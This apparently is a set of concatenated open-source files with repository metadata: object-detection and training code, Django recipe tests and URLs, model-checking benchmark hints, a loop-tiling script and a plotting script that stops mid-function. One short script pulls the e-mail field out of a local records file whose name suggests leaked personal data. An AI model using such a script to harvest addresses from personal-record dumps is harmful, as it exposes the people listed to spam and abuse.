# for separated branches, also consider self.num_shared_fcs
if (is_shared
or self.num_shared_fcs == 0) and not self.with_avg_pool:
last_layer_dim *= self.roi_feat_area
for i in range(num_branch_fcs):
fc_in_channels = (
last_layer_dim if i == 0 else self.fc_out_channels)
branch_fcs.append(
nn.Linear(fc_in_channels, self.fc_out_channels))
last_layer_dim = self.fc_out_channels
return branch_convs, branch_fcs, last_layer_dim
def init_weights(self):
super(ConvFCBBoxHeadSeparate, self).init_weights()
# conv layers are already initialized by ConvModule
for module_list in [self.shared_fcs, self.cls_fcs, self.reg_fcs]:
for m in module_list.modules():
if isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight)
nn.init.constant_(m.bias, 0)
def forward(self, x_cat, x):
# shared part
if self.num_shared_convs > 0:
for conv in self.shared_convs:
x = conv(x)
if self.num_shared_fcs > 0:
if self.with_avg_pool:
x = self.avg_pool(x)
x = x.flatten(1)
for fc in self.shared_fcs:
x = self.relu(fc(x))
# separate branches
x_cls = x_cat
x_reg = x
for conv in self.cls_convs:
x_cls = conv(x_cls)
if x_cls.dim() > 2:
if self.with_avg_pool:
x_cls = self.avg_pool(x_cls)
x_cls = x_cls.flatten(1)
for fc in self.cls_fcs:
x_cls = self.relu(fc(x_cls))
for conv in self.reg_convs:
x_reg = conv(x_reg)
if x_reg.dim() > 2:
if self.with_avg_pool:
x_reg = self.avg_pool(x_reg)
x_reg = x_reg.flatten(1)
for fc in self.reg_fcs:
x_reg = self.relu(fc(x_reg))
cls_score = self.fc_cls(x_cls) if self.with_cls else None
bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
return cls_score, bbox_pred
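# Illustrative configuration (an assumption, not taken from the repository):
# fc-only classification and conv+fc regression branches, matching the layout
# sketched in the class docstring. Note that forward() takes two inputs:
# x_cat feeds the classification branch, x the shared/regression path.
# head = ConvFCBBoxHeadSeparate(
#     num_cls_fcs=2, num_reg_convs=1, num_reg_fcs=1,
#     in_channels=256, roi_feat_size=7, num_classes=80)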
| 37.804598 | 79 | 0.564001 | [
"Apache-2.0"
] | Qianna00/mmdetection | mmdet/models/roi_heads/bbox_heads/bbox_head_separate.py | 6,578 | Python |
import tempfile
import os
from PIL import Image
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Recipe, Tag, Ingredient
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
RECIPE_URL = reverse('recipe:recipe-list')
def image_upload_url(recipe_id):
"""Return URL for recipe image upload"""
return reverse('recipe:recipe-upload-image', args=[recipe_id])
def detail_url(recipe_id):
"""Return recipe detail URL"""
return reverse('recipe:recipe-detail', args=[recipe_id])
def sample_tag(user, name='Main Course'):
"""Create and return a sample tag"""
return Tag.objects.create(user=user, name=name)
def sample_ingredient(user, name='Cinnamon'):
"""Create and return a sample ingredient"""
return Ingredient.objects.create(user=user, name=name)
def sample_recipe(user, **params):
"""Create and return a sample recipe"""
defaults = {
'title': 'Sample Recipe',
'time_minutes': 10,
'price': 5.00
}
defaults.update(params)
return Recipe.objects.create(user=user, **defaults)
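# For example (illustrative): sample_recipe(user=user, title='Porridge')
# overrides only the title and keeps the default time_minutes and price.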
class PublicRecipeApiTests(TestCase):
"""Test unathenticated recipe API access"""
def setUp(self):
self.client = APIClient()
def test_auth_required(self):
"""Test that authentication is required"""
res = self.client.get(RECIPE_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
"""Test authenticated API access"""
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'[email protected]',
'testpass'
)
self.client.force_authenticate(self.user)
def test_retrieve_recipe(self):
"""Test retrieving a list of recipe"""
sample_recipe(user=self.user)
sample_recipe(user=self.user)
res = self.client.get(RECIPE_URL)
recipes = Recipe.objects.all().order_by('-id')
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_user(self):
"""Test retrieving recipes for user"""
user2 = get_user_model().objects.create_user(
'[email protected]',
'otherpass'
)
sample_recipe(user=user2)
sample_recipe(user=self.user)
res = self.client.get(RECIPE_URL)
recipes = Recipe.objects.filter(user=self.user)
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data, serializer.data)
def test_view_recipe_detail(self):
"""Test viewing a recipe details"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
recipe.ingredients.add(sample_ingredient(user=self.user))
url = detail_url(recipe.id)
res = self.client.get(url)
serializer = RecipeDetailSerializer(recipe)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_create_basic_recipe(self):
"""Test creating recipe"""
payload = {
'title': 'Chocolate cheesecake',
'time_minutes': 30,
'price': 5.00
}
res = self.client.post(RECIPE_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
for key in payload.keys():
self.assertEqual(payload[key], getattr(recipe, key))
def test_create_recipe_with_tags(self):
"""Test creating recipe with tags"""
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Dessert')
payload = {
'title': 'Avocado lime cheesecake',
'tags': [tag1.id, tag2.id],
'time_minutes': 60,
'price': 20.00
}
res = self.client.post(RECIPE_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
tags = recipe.tags.all()
self.assertEqual(tags.count(), 2)
self.assertIn(tag1, tags)
self.assertIn(tag2, tags)
def test_create_recipe_with_ingredients(self):
"""Test creating recipe with ingredients"""
ingredient1 = sample_ingredient(user=self.user, name='Prawns')
ingredient2 = sample_ingredient(user=self.user, name='Ginger')
payload = {
'title': 'Thai prawn red curry',
'ingredients': [ingredient1.id, ingredient2.id],
'time_minutes': 20,
'price': 7.00
}
res = self.client.post(RECIPE_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
ingredients = recipe.ingredients.all()
self.assertEqual(ingredients.count(), 2)
self.assertIn(ingredient1, ingredients)
self.assertIn(ingredient2, ingredients)
def test_partial_update_recipe(self):
"""Test updating a recipe with patch"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
new_tag = sample_tag(user=self.user, name='Curry')
payload = {
'title': 'Chicken tikka',
'tags': [new_tag.id]
}
url = detail_url(recipe.id)
self.client.patch(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 1)
self.assertIn(new_tag, tags)
def test_full_update_recipe(self):
"""Test update recipe with put"""
recipe = sample_recipe(user=self.user)
recipe.tags.add(sample_tag(user=self.user))
payload = {
'title': 'Spaghetti Carbonara',
'time_minutes': 25,
'price': 5.00
}
url = detail_url(recipe.id)
self.client.put(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
self.assertEqual(recipe.time_minutes, payload['time_minutes'])
self.assertEqual(recipe.price, payload['price'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 0)
class RecipeImageUploadTests(TestCase):
def setUp(self):
self.client = APIClient()
self.user = get_user_model().objects.create_user(
'[email protected]',
'testpass'
)
self.client.force_authenticate(self.user)
self.recipe = sample_recipe(user=self.user)
def tearDown(self):
self.recipe.image.delete()
def test_upload_image_to_recipe(self):
"""Test uploading an image to recipe"""
url = image_upload_url(self.recipe.id)
with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
img = Image.new('RGB', (10, 10))
img.save(ntf, format='JPEG')
ntf.seek(0)
res = self.client.post(url, {'image': ntf}, format='multipart')
self.recipe.refresh_from_db()
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertIn('image', res.data)
self.assertTrue(os.path.exists(self.recipe.image.path))
def test_upload_image_bad_request(self):
"""Test uploading an invalid image"""
url = image_upload_url(self.recipe.id)
res = self.client.post(url, {'image': 'notimage'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_filter_recipes_by_tags(self):
"""returning recipes with specific tags"""
recipe1 = sample_recipe(user=self.user, title='Thai vegetables curry')
recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
tag1 = sample_tag(user=self.user, name='Vegan')
tag2 = sample_tag(user=self.user, name='Vegetarian')
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
recipe3 = sample_recipe(self.user, title='Fish and chips')
res = self.client.get(
RECIPE_URL,
{'tags': f'{tag1.id}, {tag2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
def test_filter_recipes_by_ingredients(self):
"""returning recipes with specific ingredients"""
recipe1 = sample_recipe(user=self.user, title='Thai vegetables curry')
recipe2 = sample_recipe(user=self.user, title='Aubergine with tahini')
ingredient1 = sample_ingredient(user=self.user, name='Vegan')
ingredient2 = sample_ingredient(user=self.user, name='Vegetarian')
recipe1.ingredients.add(ingredient1)
recipe2.ingredients.add(ingredient2)
recipe3 = sample_recipe(self.user, title='Fish and chips')
res = self.client.get(
RECIPE_URL,
{'ingredients': f'{ingredient1.id}, {ingredient2.id}'}
)
serializer1 = RecipeSerializer(recipe1)
serializer2 = RecipeSerializer(recipe2)
serializer3 = RecipeSerializer(recipe3)
self.assertIn(serializer1.data, res.data)
self.assertIn(serializer2.data, res.data)
self.assertNotIn(serializer3.data, res.data)
| 34.221453 | 78 | 0.642568 | [
"MIT"
] | Ahmed-Gemmy/recipe-app-api | app/recipe/tests/test_recipe_api.py | 9,890 | Python |
# Copyright (c) 2021. Slonos Labs. All rights Reserved.
| 28.5 | 56 | 0.719298 | [
"MIT"
] | kapousa/BrontoMind2 | app/base/gg.py | 57 | Python |
from django.conf.urls import include, url
from django.views.generic.base import TemplateView
from antioch.plugins.signup.views import ActivationView
from antioch.plugins.signup.views import RegistrationView
app_name='signup'
urlpatterns = [
url(r'^activate/complete/$',
TemplateView.as_view(template_name='registration/activation_complete.html'),
name='registration_activation_complete'),
# Activation keys get matched by \w+ instead of the more specific
# [a-fA-F0-9]{40} because a bad activation key should still get to the view;
# that way it can return a sensible "invalid key" message instead of a
# confusing 404.
url(r'^activate/(?P<activation_key>\w+)/$',
ActivationView.as_view(),
name='registration_activate'),
url(r'^register/$',
RegistrationView.as_view(),
name='registration_register'),
url(r'^register/complete/$',
TemplateView.as_view(template_name='registration/registration_complete.html'),
name='registration_complete'),
url(r'^register/closed/$',
TemplateView.as_view(template_name='registration/registration_closed.html'),
name='registration_disallowed'),
]
| 39.9 | 86 | 0.716792 | [
"MIT"
] | philchristensen/antioch | antioch/plugins/signup/urls.py | 1,197 | Python |
"""Trains a hypergraph machine on MNIST and generates Figure 1 panels b and c
of Discrete and continuous learning machines
"""
import numpy as np
import torch
import torch.nn.functional as F
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from hypergraph_machines.hypergraph_machine import HypergraphMachine
from hypergraph_machines.utils import train, test, visualise_graph
from hypergraph_machines.dataset_loader import load_dataset
from hypergraph_machines.utils import BestModelSaver, generate_timestamp, reg_loss
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(context="paper", style="white")
plt.ion()
device = torch.device("cuda")
timestamp = generate_timestamp()
batch_size, num_epochs = 128, 100
train_loader,\
test_loader,\
image_size = load_dataset("MNIST", batch_size, data_folder = "../../data")
model = HypergraphMachine((1,28,28), 10, number_of_classes = 10, tol = 1e-6,
limit_image_upsample = 2, prune=True).to(device)
optimizer = torch.optim.SGD(model.parameters(), lr= 3e-3)
saver = BestModelSaver('./checkpoints' + timestamp)
for epoch in range(1, num_epochs + 1):
print("starting epoch {} of {}".format(epoch, num_epochs))
train(model, device, train_loader, optimizer, epoch,
loss_func = reg_loss, loss_inputs = [model, F.nll_loss, 1])
loss, acc = test(model, device, test_loader)
saver.save(model, optimizer, epoch, loss, acc)
if epoch % 10 == 1:
f,ax = plt.subplots()
visualise_graph(model, ax=ax)
f.suptitle("epoch {}".format(epoch))
| 40.871795 | 82 | 0.737139 | [
"MIT"
] | Veos-Digital/hypergraph_machines | hypergraph_machines/examples/generate_figure.py | 1,594 | Python |
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 10 08:10:27 2018
@author: lenovo-pc
"""
file_path = 'D://aaa//kaifangX.txt'
email_path = 'D://aaa//99.txt'
# Read the source records and write the extracted e-mail field to a new file.
source_file = open(file_path, 'r', encoding='utf-8')
email_file = open(email_path, 'w', encoding='utf-8')
for i in range(10000):
    try:
        c = source_file.readline().split(',')[-2]
        email_file.write(c + '\n')
    except Exception as e:
        print(e)
        print('no e-mail address found')
source_file.close()
email_file.close()
| 22.631579 | 49 | 0.574419 | [
"Apache-2.0"
] | 15048040369/-1 | Frank.py | 438 | Python |
from typing import Tuple, FrozenSet
from collections.abc import Iterable
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or
from mathsat import msat_make_leq, msat_make_equal
from mathsat import msat_make_number, msat_make_plus
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def check_ltl(menv: msat_env, enc: LTLEncoder) -> Tuple[Iterable, msat_term,
msat_term, msat_term]:
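    """Builds the symbolic transition system (next-state map, init, trans) for a
    counter `i` that repeatedly counts up to `l` (which then grows by one) while
    `r` stays constant, plus the LTL property (G F inc_i) -> !(G F r > i).
    """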
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
bool_type = msat_get_bool_type(menv)
real_type = msat_get_rational_type(menv)
i = msat_declare_function(menv, "i", real_type)
i = msat_make_constant(menv, i)
r = msat_declare_function(menv, "r", real_type)
r = msat_make_constant(menv, r)
l = msat_declare_function(menv, "l", real_type)
l = msat_make_constant(menv, l)
inc_i = msat_declare_function(menv, "inc_i", bool_type)
inc_i = msat_make_constant(menv, inc_i)
x_i = msat_declare_function(menv, name_next("i"), real_type)
x_i = msat_make_constant(menv, x_i)
x_r = msat_declare_function(menv, name_next("r"), real_type)
x_r = msat_make_constant(menv, x_r)
x_l = msat_declare_function(menv, name_next("l"), real_type)
x_l = msat_make_constant(menv, x_l)
x_inc_i = msat_declare_function(menv, name_next("inc_i"), bool_type)
x_inc_i = msat_make_constant(menv, x_inc_i)
curr2next = {i: x_i, r: x_r, l: x_l, inc_i: x_inc_i}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
r_gt_0 = msat_make_gt(menv, r, zero)
r_lt_l = msat_make_lt(menv, r, l)
i_geq_0 = msat_make_geq(menv, i, zero)
init = msat_make_and(menv, r_gt_0, r_lt_l)
init = msat_make_and(menv, init,
msat_make_and(menv, i_geq_0,
msat_make_not(menv, inc_i)))
init = msat_make_and(menv, init, msat_make_gt(menv, l, zero))
# r' = r
trans = msat_make_equal(menv, x_r, r)
# i < l -> ((inc_i' & i' = i + 1) | (!inc_i' & i' = i)) & l' = l
i_lt_l = msat_make_lt(menv, i, l)
x_i_eq_i_p_1 = msat_make_and(menv, x_inc_i,
msat_make_equal(menv, x_i,
msat_make_plus(menv, i, one)))
x_i_eq_i = msat_make_and(menv, msat_make_not(menv, x_inc_i),
msat_make_equal(menv, x_i, i))
x_i_eq_i_p_1_or_i = msat_make_or(menv, x_i_eq_i_p_1, x_i_eq_i)
x_l_eq_l = msat_make_equal(menv, x_l, l)
x_i_eq_i_p_1_or_i_and_x_l_eq_l = msat_make_and(menv, x_i_eq_i_p_1_or_i,
x_l_eq_l)
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_lt_l,
x_i_eq_i_p_1_or_i_and_x_l_eq_l))
# i >= l -> i' = 0 & l' = l + 1 & !inc_i'
i_geq_l = msat_make_geq(menv, i, l)
x_i_eq_0 = msat_make_equal(menv, x_i, zero)
x_l_eq_l_p_1 = msat_make_equal(menv, x_l, msat_make_plus(menv, l, one))
x_i_eq_0_and_x_l_eq_l_p_1 = msat_make_and(menv,
msat_make_and(menv, x_i_eq_0,
x_l_eq_l_p_1),
msat_make_not(menv, x_inc_i))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_geq_l,
x_i_eq_0_and_x_l_eq_l_p_1))
# (G F inc_i) -> ! G F r > i
G_F_x_i_gt_i = enc.make_G(enc.make_F(inc_i))
r_gt_i = msat_make_gt(menv, r, i)
n_G_F_r_gt_i = msat_make_not(menv, enc.make_G(enc.make_F(r_gt_i)))
ltl = msat_make_impl(menv, G_F_x_i_gt_i, n_G_F_r_gt_i)
return TermMap(curr2next), init, trans, ltl
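# For reference, the system built by check_ltl is:
#   init:  0 < r < l, i >= 0, !inc_i
#   trans: r' = r;  i < l  -> ((inc_i' & i' = i+1) | (!inc_i' & i' = i)) & l' = l
#          i >= l -> i' = 0 & l' = l+1 & !inc_i'
#   ltl:   (G F inc_i) -> !(G F r > i)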
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
i = mgr.Symbol("i", types.REAL)
r = mgr.Symbol("r", types.REAL)
l = mgr.Symbol("l", types.REAL)
inc_i = mgr.Symbol("inc_i", types.BOOL)
symbs = frozenset([i, r, l, inc_i])
x_i = symb_to_next(mgr, i)
x_r = symb_to_next(mgr, r)
x_l = symb_to_next(mgr, l)
x_inc_i = symb_to_next(mgr, inc_i)
res = []
n0 = mgr.Real(0)
n1 = mgr.Real(1)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r2", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.GE(r, n0), mgr.GE(i, n0),
stutterT=mgr.Equals(x_r, mgr.Plus(r, i)))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r3", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(2, mgr.Equals(x_l, l))
loc2 = Location(env, mgr.GE(l, n0))
loc2.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l4", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1, loc2])
res.append(h_l)
loc0 = Location(env, mgr.GE(i, n0))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i2", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1])
res.append(h_i)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.LE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Minus(i, n1)))
h_i = Hint("h_i1", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l2", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1])
res.append(h_l)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc3", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
loc = Location(env, mgr.LE(r, n0))
loc.set_progress(0, mgr.Equals(x_r, mgr.Minus(r, n1)))
h_r = Hint("h_r1", env, frozenset([r]), symbs)
h_r.set_locs([loc])
res.append(h_r)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(2, mgr.Not(x_inc_i))
loc2 = Location(env, mgr.Not(inc_i))
loc2.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc4", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1, loc2])
res.append(h_inc)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc2", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.GE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Plus(i, n1)))
h_i = Hint("h_i0", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(2, mgr.Equals(x_r, mgr.Plus(r, n1)))
loc2 = Location(env, mgr.GE(r, n0))
loc2.set_progress(0, mgr.Equals(x_r, r))
h_r = Hint("h_r4", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1, loc2])
res.append(h_r)
loc = Location(env, mgr.GE(l, n0))
loc.set_progress(0, mgr.Equals(x_l, mgr.Plus(l, n1)))
h_l = Hint("h_l0", env, frozenset([l]), symbs)
h_l.set_locs([loc])
res.append(h_l)
loc = Location(env, mgr.Not(inc_i))
loc.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc1", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
loc0 = Location(env, mgr.GE(i, n0), mgr.GE(l, n0),
stutterT=mgr.Equals(x_i, mgr.Plus(i, l)))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i3", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1])
res.append(h_i)
loc = Location(env, inc_i)
loc.set_progress(0, x_inc_i)
h_inc = Hint("h_inc0", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
loc0 = Location(env, mgr.GE(l, n0), mgr.GE(r, n0),
stutterT=mgr.Equals(x_l, mgr.Plus(l, r)))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l3", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1])
res.append(h_l)
return frozenset(res)
| 35.433566 | 89 | 0.625222 | [
"MIT"
] | EnricoMagnago/F3 | benchmarks/f3_wrong_hints_permutations/scaling_ltl_infinite_state/17-extending_bound_30.py | 10,134 | Python |
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/fdtd-2d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/fdtd-2d/tmp_files/7353.c')
procedure('kernel_fdtd_2d')
loop(0)
known(' nx > 1 ')
known(' ny > 1 ')
tile(1,2,20,2)
tile(1,4,100,4)
tile(2,2,20,2)
tile(2,4,100,4)
tile(3,2,20,2)
tile(3,4,100,4)
| 23 | 116 | 0.722222 | [
"BSD-2-Clause"
] | LoopTilingBenchmark/benchmark | experiments/fdtd-2d/tmp_files/7353.py | 414 | Python |
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_2_2
from isi_sdk_8_2_2.models.cluster_firmware_status_node import ClusterFirmwareStatusNode # noqa: E501
from isi_sdk_8_2_2.rest import ApiException
class TestClusterFirmwareStatusNode(unittest.TestCase):
"""ClusterFirmwareStatusNode unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testClusterFirmwareStatusNode(self):
"""Test ClusterFirmwareStatusNode"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_2_2.models.cluster_firmware_status_node.ClusterFirmwareStatusNode() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 24.04878 | 109 | 0.730223 | [
"Unlicense"
] | Isilon/isilon_sdk_python | isi_sdk_8_2_2/test/test_cluster_firmware_status_node.py | 986 | Python |
from argparse import ArgumentParser
import enum
from pathlib import Path
from matplotlib import pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
import yaml
import pandas as pd
METRICS = ['total_L1', '0_to10mm_L1', '10_to20mm_L1', 'above20mm_L1']
METRICS_TITLE = ['L1Loss', 'L1Loss in [0,10) mm', 'L1Loss in [10,20) mm', 'L1Loss above 20 mm']
def get_xticks(dir, trainer_ids):
mapping = {}
for trainer_id in trainer_ids:
if trainer_id in mapping.keys():
continue
config_path = dir / trainer_id / 'config.yml'
with open(config_path) as f:
config = yaml.safe_load(f)
ds_config = config['dataset_config']
nw_config = config['network_config']
dd = ds_config['depth_difference_threshold'] if 'depth_difference_threshold' in ds_config else 0
s = ds_config['scale_images']
ic = nw_config['initial_channels']
lr = nw_config['learning_rate']
lt = nw_config['loss_type']
o = nw_config['output_activation'] if 'output_activation' in nw_config else 'none'
sk = int(nw_config['skip_connections']) if 'skip_connections' in nw_config else 0
if lt == 'huber_loss':
lt = 'h'
elif lt == 'mean_l1_loss':
lt = 'l1'
elif lt == 'mean_l2_loss':
lt = 'l2'
if o == 'none':
o = 'n'
elif o == 'relu':
o = 'r'
base_title = f"dd{dd}_s{s}_ic{ic}_lr{lr}_l{lt}_o{o}_sk{sk}"
num_titles = [v.startswith(base_title) for v in mapping.values()].count(True)
title = base_title + f"_{num_titles}"
mapping[trainer_id] = title
return mapping
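# Illustration with hypothetical values: dd=0, s=0.5, ic=32, lr=0.001, loss 'huber_loss',
# output 'none', no skip connections would yield a title like "dd0_s0.5_ic32_lr0.001_lh_on_sk0_0".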
def generate_bar_plot(df):
df_grouped = df.groupby(['title', 'it_ot'])
df_grouped_mean = df_grouped.mean()
df_grouped_std = df_grouped.std()
_, ax = plt.subplots(1, len(METRICS), figsize=(10, 5))
for idx, metric in enumerate(METRICS):
df_mean = df_grouped_mean.get(metric).unstack()
df_std = df_grouped_std.get(metric).unstack()
df_mean.plot.bar(ax=ax[idx], yerr=df_std, use_index=False, ylim=(0, None))
ax[idx].set_title(METRICS_TITLE[idx], fontdict=dict(fontsize=9))
ax[idx].set_xticklabels(df_mean.index)
leg = ax[idx].legend(frameon=True, fontsize=8)
leg.set_title(None)
# leg.get_frame().set_alpha(None)
# leg.get_frame().set_facecolor((1, 1, 1, 0.5))
# leg.get_frame().set_edgecolor('black')
# leg.get_frame().set_linewidth(0.5)
def get_box_plot(df: pd.DataFrame):
def set_box_color(bp, color):
plt.setp(bp['boxes'], color=color)
plt.setp(bp['whiskers'], color=color)
plt.setp(bp['caps'], color=color)
plt.setp(bp['medians'], color=color)
# sort first N models by loss
N = 5 # 10
df_grouped = df.groupby(['title', 'it_ot'])
df_grouped_mean = df_grouped.median().unstack()
df_grouped_mean_metric = df_grouped_mean[METRICS[0]]
df_grouped_mean['metricDiff'] = df_grouped_mean_metric['output/target'] - df_grouped_mean_metric['input/target']
df_grouped_mean.sort_values(by=['metricDiff'], ascending=[True], inplace=True)
sorted_titles = df_grouped_mean.reset_index()['title'].iloc[:N].to_list()
df = df_grouped.filter(lambda x: x['title'].isin(sorted_titles).all())
# group by (title, it_ot) and create it/ot colors
df_grouped = df.groupby(['title', 'it_ot'])
it_colors = {
title: np.asarray(plt.get_cmap('tab20')((2 * idx + 1) / 20))
for idx, title in enumerate(sorted_titles) # without i/t pairs
}
ot_colors = {
title: np.asarray(plt.get_cmap('tab20')((2 * idx) / 20))
for idx, title in enumerate(sorted_titles) # without i/t pairs
}
fig, ax = plt.subplots(1, len(METRICS), figsize=(10, 4))
for plot_idx, metric in enumerate(METRICS):
width = 0.6
inner_space = width * 2/3
outer_space = 2
df_grouped_metric = df_grouped[metric].apply(list)
df_ot_grouped = df_grouped_metric.loc[:, 'output/target']
df_it_grouped = df_grouped_metric.loc[:, 'input/target']
for idx, title in enumerate(sorted_titles):
it_value = df_it_grouped.loc[title]
bp_it = ax[plot_idx].boxplot(it_value, positions=[idx * outer_space - inner_space],
sym='', widths=width)
